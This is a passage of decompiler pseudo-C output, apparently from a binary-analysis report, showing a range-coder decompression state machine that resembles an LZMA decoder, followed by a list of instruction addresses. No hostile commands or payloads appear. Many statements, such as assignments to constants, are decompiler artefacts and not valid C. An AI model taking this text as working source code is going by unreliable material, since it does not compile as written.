												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                    0x00000000
                                                    0x00406c97
                                                    0x00406c97
                                                    0x00406c9b
                                                    0x00406ca8
                                                    0x00406cb2
                                                    0x00000000
                                                    0x00406c9d
                                                    0x00406c9d
                                                    0x00406cd8
                                                    0x00406cdb
                                                    0x00406cde
                                                    0x00406ce1
                                                    0x00406ce1
                                                    0x00406ce4
                                                    0x00406ceb
                                                    0x00406cf0
                                                    0x00406bd1
                                                    0x00406bd4
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f97
                                                    0x00406f9b
                                                    0x0040714a
                                                    0x00407160
                                                    0x00407168
                                                    0x0040716f
                                                    0x00407171
                                                    0x00407178
                                                    0x0040717c
                                                    0x0040717c
                                                    0x00406fa7
                                                    0x00406fae
                                                    0x00406fb6
                                                    0x00406fb9
                                                    0x00406fbc
                                                    0x00406fbc
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x0040675e
                                                    0x0040675e
                                                    0x0040675e
                                                    0x00406767
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00000000
                                                    0x00406778
                                                    0x00000000
                                                    0x00000000
                                                    0x00406781
                                                    0x00406784
                                                    0x00406787
                                                    0x0040678b
                                                    0x00000000
                                                    0x00000000
                                                    0x00406791
                                                    0x00406794
                                                    0x00406796
                                                    0x00406797
                                                    0x0040679a
                                                    0x0040679c
                                                    0x0040679d
                                                    0x0040679f
                                                    0x004067a2
                                                    0x004067a7
                                                    0x004067ac
                                                    0x004067b5
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d7
                                                    0x004067ff
                                                    0x00406801
                                                    0x0040680f
                                                    0x0040680f
                                                    0x00406813
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406803
                                                    0x00406803
                                                    0x00406806
                                                    0x00406807
                                                    0x00406807
                                                    0x00000000
                                                    0x00406803
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e2
                                                    0x004067eb
                                                    0x004067f3
                                                    0x004067f6
                                                    0x00000000
                                                    0x004067fc
                                                    0x004067fc
                                                    0x00000000
                                                    0x004067fc
                                                    0x00000000
                                                    0x00406819
                                                    0x00406819
                                                    0x0040681d
                                                    0x004070c9
                                                    0x00000000
